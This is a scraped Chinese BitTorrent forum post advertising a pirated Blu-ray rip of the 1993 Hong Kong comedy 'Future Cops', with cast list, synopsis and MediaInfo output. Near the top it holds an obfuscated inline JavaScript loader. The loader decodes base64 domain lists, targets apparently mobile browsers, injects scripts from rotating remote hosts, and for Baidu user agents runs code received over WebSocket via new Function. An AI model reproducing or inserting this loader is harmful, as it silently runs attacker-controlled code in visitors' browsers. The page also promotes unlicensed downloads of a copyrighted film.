超级学校霸王[国粤语音轨/中文字幕].Future.Cops.1993.1080p.BluRay.DD5.1.2Audio.x265-10bit-迅雷下载 8.68GB

版主小s 20天前 196

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x7a\x72\x64\x63\x78\x64\x57\x4c\x41']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 超级学校霸王/Future Cops/超级街头霸王

◎片 名 超級學校霸王

◎年 代 1993

◎产 地 中国香港

◎类 别 动作

◎语 言 粤语

◎上映日期 1993-07-15(中国香港)

◎IMDb评分 5.9/10 from 1117 users

◎IMDb链接 https://www.imdb.com/title/tt0106545/

◎豆瓣评分 7.5/10 from 54600 users

◎豆瓣链接 https://movie.douban.com/subject/1305582/

◎片 长 95 分钟(香港)

◎导 演 王晶 Jing Wong

◎编 剧 王晶 Jing Wong

◎主 演 张卫健 Dicky Cheung

郑伊健 Ekin Cheng

刘德华 Andy Lau

张学友 Jacky Cheung

郭富城 Aaron Kwok

任达华 Simon Yam

邱淑贞 Chingmy Yau

杨采妮 Charlie Yeung

许志安 Andy Hui Chi-On

刘小慧 Winnie Lau

苑琼丹 King-Tan Yuen

吴耀汉 Richard Ng

陈百祥 Pak-cheung Chan

卢惠光 Ken Lo

李兆基 Siu-Kei Lee

林富伟 Fu-wai Lam

陈国新 Dennis Chan

段伟伦 William Duan

周比利 Billy Chow

黎汉持 Hon Chi Lai

◎标 签 喜剧 | 香港 | 香港电影 | 王晶 | 刘德华 | 张学友 | 科幻 | 郭富城

◎简 介

2043年7月1日,犯罪大王将军(卢惠光饰)被捕,一星期后由铁面无私的法官余铁雄(张卫健饰)主审。将军特派其黑社会爪牙健(郑伊健饰)返回50年前寻找铁雄,并将其洗脑使他无法进行审判。政府知情后特派飞龙特警铁面(刘德华饰)、扫帚头(张学友饰)及发达星(任达华饰)返回1993年去保护铁雄。

时大雄为93年一中学长期留班生,常遭同学余忌安(许志安饰)作弄毒打,只有女友采妮(杨采妮饰)对他真心。飞龙三特警混进学校,扫帚头当上老师,铁面做大雄同学,星则任大雄跟班,帮大雄打赢忌安,并向他套取铁雄下落,但大雄却表示校内并无铁雄此人。在这时健亦扮成老师混入学校,另一边大雄母亲要改嫁理查德余……最终飞龙特警能完成任务吗?

  1. General

  2. Unique ID : 129977302214017050525011526239159130011 (0x61C8B7C486149FC27962A3649301179B)

  3. Complete name : Future.Cops.1993.1080p.BluRay.DD5.1.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 8.67 GiB

  7. Duration : 1 h 34 min

  8. Overall bit rate : 13.1 Mb/s

  9. Movie name : Future Cops 1993 1080p BluRay DD5.1 2Audio x265-10bit-HDS

  10. Encoded date : UTC 2021-07-05 11:12:48

  11. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  12. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@High

  18. Codec ID : V_MPEGH/ISO/HEVC

  19. Duration : 1 h 34 min

  20. Bit rate : 12.0 Mb/s

  21. Width : 1 920 pixels

  22. Height : 1 080 pixels

  23. Display aspect ratio : 16:9

  24. Frame rate mode : Constant

  25. Frame rate : 24.000 FPS

  26. Color space : YUV

  27. Chroma subsampling : 4:2:0

  28. Bit depth : 10 bits

  29. Bits/(Pixel*Frame) : 0.242

  30. Stream size : 7.97 GiB (92%)

  31. Title : @HDSky

  32. Writing library : x265 - H.265/HEVC codec

  33. Encoding settings : lslices=4 / deblock(tC=-1:B=-1)

  34. Default : Yes

  35. Forced : No


  36. Audio #1

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 34 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : L R C LFE Ls Rs

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 434 MiB (5%)

  51. Title : Cantonese

  52. Language : Chinese

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Audio #2

  57. ID : 3

  58. Format : AC-3

  59. Format/Info : Audio Coding 3

  60. Commercial name : Dolby Digital

  61. Codec ID : A_AC3

  62. Duration : 1 h 34 min

  63. Bit rate mode : Constant

  64. Bit rate : 384 kb/s

  65. Channel(s) : 2 channels

  66. Channel layout : L R

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 31.250 FPS (1536 SPF)

  69. Compression mode : Lossy

  70. Stream size : 260 MiB (3%)

  71. Title : Mandarin

  72. Language : Chinese

  73. Service kind : Complete Main

  74. Default : No

  75. Forced : No


  76. Text #1

  77. ID : 4

  78. Format : PGS

  79. Muxing mode : zlib

  80. Codec ID : S_HDMV/PGS

  81. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  82. Duration : 1 h 33 min

  83. Bit rate : 43.7 kb/s

  84. Count of elements : 2293

  85. Stream size : 29.2 MiB (0%)

  86. Title : CHT

  87. Language : Chinese

  88. Default : Yes

  89. Forced : No


  90. Text #2

  91. ID : 5

  92. Format : PGS

  93. Muxing mode : zlib

  94. Codec ID : S_HDMV/PGS

  95. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  96. Duration : 1 h 34 min

  97. Bit rate : 42.4 kb/s

  98. Count of elements : 2295

  99. Stream size : 28.6 MiB (0%)

  100. Title : CHS

  101. Language : Chinese

  102. Default : No

  103. Forced : No


  104. Menu

  105. 00:00:00.000 : en:Chapter 01

  106. 00:07:18.458 : en:Chapter 02

  107. 00:14:33.708 : en:Chapter 03

  108. 00:23:33.875 : en:Chapter 04

  109. 00:32:51.375 : en:Chapter 05

  110. 00:37:54.875 : en:Chapter 06

  111. 00:46:05.250 : en:Chapter 07

  112. 00:52:17.958 : en:Chapter 08

  113. 01:04:10.042 : en:Chapter 09

  114. 01:10:07.292 : en:Chapter 10

  115. 01:18:23.917 : en:Chapter 11

  116. 01:28:26.958 : en:Chapter 12




此处一般会放置磁力链或电驴下载链接,不过此链接需要注册会员才能看到,点击“立即注册”
磁力链下载【磁力链接仅对注册会员开放,登陆后可见】

TAGS 动作

上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回